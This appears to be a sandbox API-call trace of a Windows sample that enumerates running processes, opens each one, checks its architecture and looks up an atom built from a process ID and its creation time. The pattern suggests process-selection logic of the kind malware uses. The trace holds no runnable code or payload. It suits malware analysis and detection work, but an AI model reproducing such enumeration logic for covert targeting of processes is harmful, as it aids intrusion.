	[0075.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.028] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.028] CloseHandle (hObject=0x224) returned 1
	[0075.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.029] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.029] CloseHandle (hObject=0x224) returned 1
	[0075.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.029] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.029] CloseHandle (hObject=0x224) returned 1
	[0075.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.030] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.030] CloseHandle (hObject=0x224) returned 1
	[0075.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.031] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.031] CloseHandle (hObject=0x224) returned 1
	[0075.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.031] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.031] CloseHandle (hObject=0x224) returned 1
	[0075.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.032] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.032] CloseHandle (hObject=0x224) returned 1
	[0075.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.033] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.033] CloseHandle (hObject=0x224) returned 1
	[0075.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.033] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.033] CloseHandle (hObject=0x224) returned 1
	[0075.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0075.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.034] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.034] CloseHandle (hObject=0x224) returned 1
	[0075.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0075.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.034] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.034] CloseHandle (hObject=0x224) returned 1
	[0075.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.035] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.035] CloseHandle (hObject=0x224) returned 1
	[0075.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.035] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.035] CloseHandle (hObject=0x224) returned 1
	[0075.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.036] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.036] CloseHandle (hObject=0x224) returned 1
	[0075.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0075.036] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.036] CloseHandle (hObject=0x224) returned 1
	[0075.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.036] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.036] CloseHandle (hObject=0x224) returned 1
	[0075.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.037] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.037] CloseHandle (hObject=0x224) returned 1
	[0075.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.038] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.038] CloseHandle (hObject=0x224) returned 1
	[0075.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e888, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0075.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.038] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.039] CloseHandle (hObject=0x224) returned 1
	[0075.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.039] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.039] CloseHandle (hObject=0x224) returned 1
	[0075.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.040] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.040] CloseHandle (hObject=0x224) returned 1
	[0075.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.040] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.040] CloseHandle (hObject=0x224) returned 1
	[0075.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.041] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.041] CloseHandle (hObject=0x224) returned 1
	[0075.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.041] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.042] CloseHandle (hObject=0x224) returned 1
	[0075.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72eb30, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0075.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.042] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.042] CloseHandle (hObject=0x224) returned 1
	[0075.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e888, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0075.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.043] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.043] CloseHandle (hObject=0x224) returned 1
	[0075.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.043] GetLastError () returned 0x5
	[0075.043] GetLastError () returned 0x5
	[0075.043] GetLastError () returned 0x5
	[0075.043] GetLastError () returned 0x5
	[0075.043] GetLastError () returned 0x5
	[0075.043] GetLastError () returned 0x5
	[0075.043] GetLastError () returned 0x5
	[0075.043] GetLastError () returned 0x5
	[0075.043] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.044] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetLastError () returned 0x5
	[0075.045] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.046] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0075.046] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.046] GetLastError () returned 0x5
	[0075.046] GetLastError () returned 0x5
	[0075.046] GetLastError () returned 0x5
	[0075.046] GetLastError () returned 0x5
	[0075.046] GetLastError () returned 0x5
	[0075.046] GetLastError () returned 0x5
	[0075.046] GetLastError () returned 0x5
	[0075.046] GetLastError () returned 0x5
	[0075.046] GetLastError () returned 0x5
	[0075.046] GetLastError () returned 0x5
	[0075.046] GetLastError () returned 0x5
	[0075.046] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.047] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.048] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.049] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetLastError () returned 0x5
	[0075.050] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.051] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.051] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.051] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.051] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.051] CloseHandle (hObject=0x224) returned 1
	[0075.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.052] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.052] CloseHandle (hObject=0x224) returned 1
	[0075.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e798, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0075.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.053] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.053] CloseHandle (hObject=0x224) returned 1
	[0075.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16cc8) returned 0xc0000004
	[0075.087] VirtualAlloc (lpAddress=0x0, dwSize=0x16dc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0075.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16dc8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0075.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0075.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
